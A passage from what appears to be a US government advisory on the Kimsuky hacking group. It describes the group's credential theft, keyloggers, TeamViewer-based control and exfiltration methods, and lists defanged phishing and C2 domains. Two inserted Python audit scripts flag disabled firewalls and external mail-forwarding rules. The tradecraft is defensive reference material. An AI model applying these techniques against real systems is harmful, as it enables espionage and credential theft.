href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">42</a>]</li> <li>Kimsuky has used <code>mshta.exe</code>, which is a utility that executes Microsoft HTAs. It can be used for proxy execution of malicious <code>.hta</code> files and JavaScript or VBS through a trusted Windows utility (<em>Signed Binary Proxy Execution: Mshta</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1218/005">T1218.005</a>]). It can also be used to bypass application allowlisting solutions (<em>Abuse Elevation Control Mechanism: Bypass User Account Control</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1548/002">T1548.002</a>]).[<a href="https://attack.mitre.org/groups/G0094/">43</a>],[<a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/">44</a>]</li> <li>Win7Elevate—which was noted above—is also used to evade traditional security measures. Win7Elevate is part of the Metasploit framework open-source code and is used to inject malicious code into <code>explorer.exe</code> (<em>Process Injection</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055">T1055</a>]). 
The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim’s temporary folder, and loads the file as a library.[<a href="https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities">45</a>],[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">46</a>],[<a href="https://attack.mitre.org/groups/G0094/">47</a>]</li> </ul> <h4 style="margin-top: 8px; margin-bottom: 8px;">Credential Access</h4> <p>Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (<em>Credential Access</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0006/">TA0006</a>]).</p> <ul> <li>Kimsuky uses memory dump programs instead of well-known malicious software and performs the credential extraction offline. Kimsuky uses <code>ProcDump</code>, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (<em>OS Credential Dumping</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/">T1003</a>]). <code>ProcDump</code> monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer. 
It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of <code>ProcDump</code> in the BabyShark malware.[<a href="https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/">48</a>]</li> <li>According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (<em>Man-in-the-Browser</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1185/">T1185</a>]).[<a href="https://attack.mitre.org/groups/G0094/">49</a>],[<a href="https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/">50</a>] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named <code>jQuery.js</code>, from a separate site (see figure 3).[<a href="https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/">51</a>]</li> </ul> <p class="text-align-center"><em>[Figure 3 image not reproduced. The figure shows the source of <code>jQuery.js</code>: a function that issues an HTTP GET for a <code>jquery.js</code> path under <code>bizsonet[.]com</code> and returns the response text, followed by a routine that appends a new <code>script</code> element loading <code>jquery-3.3.1.min.js</code> from the same domain to the document head.]</em></p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Figure 3: JavaScript file, named <code>jQuery.js</code></em> [<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">52</a>]</p> <ul> <li>Kimsuky also uses a PowerShell-based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (<em>Input Capture: Keylogging</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1056/001/">T1056.001</a>], <em>Network Sniffing</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1040/">T1040</a>]). MECHANICAL logs keystrokes to <code>%userprofile%\appdata\roaming\apach.{txt,log}</code> and is also a "cryptojacker," which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">53</a>]</li> <li>Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the website accessed by the victim and to collect any credentials entered by the victim.[54]</li> </ul> <h4 style="margin-top: 8px; margin-bottom: 8px;">Discovery</h4> <p>Kimsuky enumerates system information and the file structure for victims’ computers and networks (<em>Discovery</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0007/">TA0007</a>]). Kimsuky appears to rely on using the victim’s operating system command prompt to enumerate the file structure and system information (<em>File and Directory Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1083/">T1083</a>]). 
The information is directed to <code>C:\WINDOWS\msdatl3.inc</code>, read by malware, and likely emailed to the malware’s command server.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">55</a>]</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Collection</h4> <p>Kimsuky collects data from the victim system through its HWP document malware and its keylogger (<em>Collection</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0009/">TA0009</a>]). The HWP document malware changes the default program association in the Registry to open HWP documents (<em>Event Triggered Execution: Change Default File Association</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/001/">T1546.001</a>]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary’s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred. The keylogger intercepts keystrokes and writes them to <code>C:\Program Files\Common Files\System\Ole DB\msolui80.inc</code> and records the active window name where the user pressed keys (<em>Input Capture: Keylogging</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1056/001/">T1056.001</a>]). There is another keylogger variant that logs keystrokes into <code>C:\WINDOWS\setup.log</code>.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">56</a>]</p> <p>Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (<em>Command and Scripting Interpreter: Python</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/006/">T1059.006</a>]). 
The Python program downloads various implants based on C2 options specified in the URL after <code>filedown.php</code> (see figure 4).</p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Figure 4: Python Script targeting MacOS</em> (images not reproduced) [57]</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Command and Control</h4> <p>Kimsuky has used a modified TeamViewer client, version 5.0.9104, for <em>Command and Control</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0011/">TA0011</a>] (<em>Remote Access Software</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1219/">T1219</a>]). During the initial infection, the service “Remote Access Service” is created and adjusted to execute <code>C:\Windows\System32\vcmon.exe</code> at system startup (<em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001/">T1547.001</a>]). Every time <code>vcmon.exe</code> is executed, it disables the firewall by zeroing out Registry values (<em>Impair Defenses: Disable or Modify System Firewall</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1562/004/">T1562.004</a>]). 
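Both the Defense Evasion section (figure 2) and the <code>vcmon.exe</code> behaviour just described come down to the same observable: Windows firewall profile values zeroed in the Registry, with the Security Center service silenced so nobody is told. The following audit is an added example written for this advisory, not advisory code: it parses text in the <code>.reg</code> format that <code>reg export</code> writes and reports the firewall-disabling values. The export text is constructed; checking <code>wscsvc</code> with <code>Start=4</code> (service disabled) is this example's assumption about how the Security Center service would be turned off, since the advisory does not say which value the malware changes.

```python
"""Audit a Windows Registry export for firewall-disabling values.

Added example for this advisory, not advisory code. Input is text in the .reg format
written by `reg export` (UTF-16 on disk; decode it before calling parse_reg). The
checks flag EnableFirewall=0 under the FirewallPolicy profile keys and the Security
Center service (wscsvc) set to Start=4 (disabled); the latter is this example's
assumption about how the service would be silenced. The export below is constructed.
"""
from __future__ import annotations

import re

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<raw>.+)$')


def parse_reg(text: str) -> dict[str, dict[str, object]]:
    """Return {key_path: {value_name: value}} for dword and string values."""
    keys: dict[str, dict[str, object]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group("key")
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, raw = m.group("name"), m.group("raw")
            if raw.startswith("dword:"):
                keys[current][name] = int(raw[len("dword:"):], 16)
            elif raw.startswith('"') and raw.endswith('"'):
                # .reg files double backslashes inside string values
                keys[current][name] = raw[1:-1].replace("\\\\", "\\")
            # hex(...) and other types are not needed for this audit
    return keys


FIREWALL_BASE = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy"
PROFILES = ("DomainProfile", "StandardProfile", "PublicProfile")
WSCSVC_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc"
SERVICE_DISABLED = 4  # Start=4 means the service is disabled


def audit(keys: dict[str, dict[str, object]]) -> list[str]:
    findings = []
    for profile in PROFILES:
        values = keys.get(f"{FIREWALL_BASE}\\{profile}", {})
        if values.get("EnableFirewall") == 0:
            findings.append(f"firewall disabled in {profile}")
    if keys.get(WSCSVC_KEY, {}).get("Start") == SERVICE_DISABLED:
        findings.append("Security Center service (wscsvc) disabled")
    return findings


SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=dword:00000000
"DoNotAllowExceptions"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc]
"Start"=dword:00000004
"DisplayName"="@%SystemRoot%\\system32\\wscsvc.dll,-200"
'''  # constructed export; a clean host has EnableFirewall=1 and wscsvc Start=2

if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_EXPORT)):
        print(f"[!] {finding}")
```

On a live host the same values can be read with <code>reg query</code> or PowerShell's <code>Get-ItemProperty</code>; parsing an export as above is what you want during incident response, when the evidence is a collected hive rather than a running machine.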
The program then modifies the TeamViewer Registry settings by changing the <code>TeamViewer</code> strings in TeamViewer components. The launcher then configures several Registry values, including <code>SecurityPasswordAES</code>, that control how the remote access tool will work. The <code>SecurityPasswordAES</code> Registry value represents a hash of the password used by a remote user to connect to the TeamViewer client (<em>Use Alternate Authentication Material: Pass the Hash</em> [<a href="https://attack.mitre.org/techniques/T1550/002/">T1550.002</a>]). This way, the attackers set a pre-shared authentication value to have access to the TeamViewer client. The attacker will then execute the TeamViewer client <code>netsvcs.exe</code>.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">58</a>]</p> <p>Kimsuky has been using a consistent C2 URL format. In the URL used recently—<code>express[.]php?op=1</code>—there appears to be an option range from 1 to 3.[59]</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Exfiltration</h4> <p>Open-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email or through an RC4 key generated as an MD5 hash or a randomly generated 117-byte buffer (<em>Exfiltration</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0010/">TA0010</a>]).</p> <p>There was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky’s intention is to steal information, not to disrupt computer networks. 
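Email is the exfiltration channel this section describes, including auto-forward rules placed in the victim's mailbox, and those rules are something a mail administrator can enumerate and audit. The check below is an added example written for this advisory, not advisory code. Its input mimics a JSON export of Exchange Online inbox rules (as <code>Get-InboxRule | ConvertTo-Json</code> would produce); the property names <code>Name</code>, <code>Enabled</code>, <code>ForwardTo</code>, <code>ForwardAsAttachmentTo</code>, <code>RedirectTo</code>, <code>DeleteMessage</code> and <code>MailboxOwnerId</code> are Exchange's, while the recipient string form <code>Display Name [SMTP:user@domain]</code>, the <code>example.org</code> tenant and the sample rules are constructed.

```python
"""Find mailbox inbox rules that forward or redirect mail outside the organization.

Added example for this advisory, not advisory code. The export mimics
`Get-InboxRule | ConvertTo-Json`; the property names are Exchange's, the recipient
string format "Display Name [SMTP:user@domain]" and the rules themselves are constructed.
"""
from __future__ import annotations

import json
import re

ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@([A-Za-z0-9.-]+\.[A-Za-z]{2,})")
FORWARD_PROPS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")


def external_targets(rule: dict, internal_domains: set[str]) -> list[str]:
    """Addresses this rule sends mail to whose domain is not in internal_domains."""
    targets = []
    for prop in FORWARD_PROPS:
        for entry in rule.get(prop) or []:  # ConvertTo-Json emits null for unset lists
            for m in ADDRESS_RE.finditer(entry):
                if m.group(1).lower() not in internal_domains:
                    targets.append(m.group(0).lower())
    return targets


def audit_rules(export_json: str, internal_domains: set[str]) -> list[dict]:
    internal = {d.lower() for d in internal_domains}
    findings = []
    for rule in json.loads(export_json):
        if not rule.get("Enabled", True):
            continue
        external = external_targets(rule, internal)
        if not external:
            continue
        findings.append({
            "mailbox": rule.get("MailboxOwnerId"),
            "rule": rule.get("Name"),
            "external": external,
            # forwarding combined with deletion hides the copy from the mailbox owner
            "hides_copy": bool(rule.get("DeleteMessage")),
        })
    return findings


SAMPLE_EXPORT = json.dumps([  # constructed rules for the constructed example.org tenant
    {"MailboxOwnerId": "analyst@example.org", "Name": "Archive newsletters", "Enabled": True,
     "ForwardTo": ["Archive Box [SMTP:archive@example.org]"], "DeleteMessage": False},
    {"MailboxOwnerId": "analyst@example.org", "Name": ".", "Enabled": True,
     "ForwardTo": ["[SMTP:collector@mail.example.net]"], "DeleteMessage": True},
    {"MailboxOwnerId": "director@example.org", "Name": "old", "Enabled": False,
     "RedirectTo": ["x [SMTP:old@example.net]"], "DeleteMessage": False},
    {"MailboxOwnerId": "director@example.org", "Name": "Vendor copies", "Enabled": True,
     "ForwardAsAttachmentTo": ["Vendor [SMTP:ops@vendor.example.com]"], "DeleteMessage": False},
])

if __name__ == "__main__":
    for finding in audit_rules(SAMPLE_EXPORT, {"example.org"}):
        print(finding)
```

Rules whose name is a single character or punctuation (the second sample) and rules that both forward and delete are the ones to look at first; a disabled rule is skipped here but is still worth reviewing, since it can be re-enabled without creating a new object.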
Kimsuky’s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (<em>Archive Collected Data</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1560">T1560</a>]). Kimsuky also sets up auto-forward rules within a victim’s email account (<em>Email Collection: Email Forwarding Rule</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1114/003/">T1114.003</a>]).</p> <p>Kimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-byte buffer to exfiltrate stolen data. The data is sent RSA-encrypted (<em>Encrypted Channel: Symmetric Cryptography</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1573/001">T1573.001</a>]). Kimsuky’s malware constructs an 1120-bit public key and uses it to encrypt the 117-byte buffer. The resulting data file is saved in <code>C:\Program Files\Common Files\System\Ole DB\</code> (<em>Data Staged: Local Data Staging</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1074/001">T1074.001</a>]).[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">60</a>]</p> <h3>Mitigations</h3><h4 style="margin-top: 8px; margin-bottom: 8px;">Indicators of Compromise</h4> <p style="margin-top: 8px; margin-bottom: 8px;">Kimsuky has used the domains listed in table 1 to carry out its objectives:</p> <p style="margin-bottom: 8px;">For a downloadable copy of IOCs, see <a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-301A.stix.xml">AA20-301A.stix</a>.</p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Table 1: Domains used by Kimsuky</em></p> <table> <tbody> <tr> 
<td><p><code>login.bignaver[.]com</code></p></td> <td><p><code>nytimes.onekma[.]com</code></p></td> <td><p><code>webuserinfo[.]com</code></p></td> </tr> <tr> <td><p><code>member.navier.pe[.]hu</code></p></td> <td><p><code>nid.naver.onektx[.]com</code></p></td> <td><p><code>pro-navor[.]com</code></p></td> </tr> <tr> <td><p><code>cloudnaver[.]com</code></p></td> <td><p><code>read.tongilmoney[.]com</code></p></td> <td><p><code>naver[.]pw</code></p></td> </tr> <tr> <td><p><code>resetprofile[.]com</code></p></td> <td><p><code>nid.naver.unicrefia[.]com</code></p></td> <td><p><code>daurn[.]org</code></p></td> </tr> <tr> <td><p><code>servicenidnaver[.]com</code></p></td> <td><p><code>mail.unifsc[.]com</code></p></td> <td><p><code>naver.com[.]de</code></p></td> </tr> <tr> <td><p><code>account.daurn.pe[.]hu</code></p></td> <td><p><code>member.daum.unikortv[.]com</code></p></td> <td><p><code>ns.onekorea[.]me</code></p></td> </tr> <tr> <td><p><code>login.daum.unikortv[.]com</code></p></td> <td><p><code>securetymail[.]com</code></p></td> <td><p><code>riaver[.]site</code></p></td> </tr> <tr> <td><p><code>account.daum.unikortv[.]com</code></p></td> <td><p><code>help-navers[.]com</code></p></td> <td><p><code>mailsnaver[.]com</code></p></td> </tr> <tr> <td><p><code>daum.unikortv[.]com</code></p></td> <td><p><code>beyondparallel.sslport[.]work</code></p></td> <td><p><code>cloudmail[.]cloud</code></p></td> </tr> <tr> <td><p><code>member.daum.uniex[.]kr</code></p></td> <td><p><code>comment.poulsen[.]work</code></p></td> <td><p><code>helpnaver[.]com</code></p></td> </tr> <tr> <td><p><code>jonga[.]ml</code></p></td> <td><p><code>impression.poulsen[.]work</code></p></td> <td><p><code>view-naver[.]com</code></p></td> </tr> <tr> <td><p><code>myaccounts.gmail.kr-infos[.]com</code></p></td> <td><p><code>statement.poulsen[.]work</code></p></td> <td><p><code>view-hanmail[.]net</code></p></td> </tr> <tr> <td><p><code>naver.hol[.]es</code></p></td> <td><p><code>demand.poulsen[.]work</code></p></td> <td><p><code>login.daum.net-accounts[.]info</code></p> 
</td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>dept-dr.lab.hol[.]es</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>sankei.sslport[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>read-hanmail[.]net</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>Daurn.pe[.]hu</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>sts.desk-top[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>net.tm[.]ro</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>Bigfile.pe[.]hu</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 
8px;"><code>hogy.desk-top[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>daum.net[.]pl</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>Cdaum.pe[.]hu</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>kooo[.]gq </code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>usernaver[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>eastsea.or[.]kr</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>tiosuaking[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]ec</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 
8px;"><code>myaccount.nkaac[.]net</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>help.unikoreas[.]kr</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]mx</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.koreagov[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>resultview[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]se</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.onegov[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>account.daum.unikftc[.]kr</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" 
valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]cm</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>member-authorize[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>ww-naver[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>nid.naver.com[.]se</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.unibok[.]kr</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>vilene.desk-top[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>csnaver[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>nid.naver.unibok[.]kr</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 
7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>amberalexander.ghtdev[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p><code>nidnaver[.]email</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>read-naver[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>nidnaver[.]net</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>cooper[.]center</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>dubai-1[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>coinone.co[.]in</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>nidlogin.naver.corper[.]be</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; 
width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>amberalexander.ghtdev[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]pl</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>nid.naver.corper[.]be</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>gloole[.]net</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver[.]cx</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naverdns[.]co</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>smtper[.]org</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>smtper[.]cz</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; 
padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.co[.]in</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>login.daum.kcrct[.]ml</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>myetherwallet.com[.]mx</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>downloadman06[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>login.outlook.kcrct[.]ml</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p 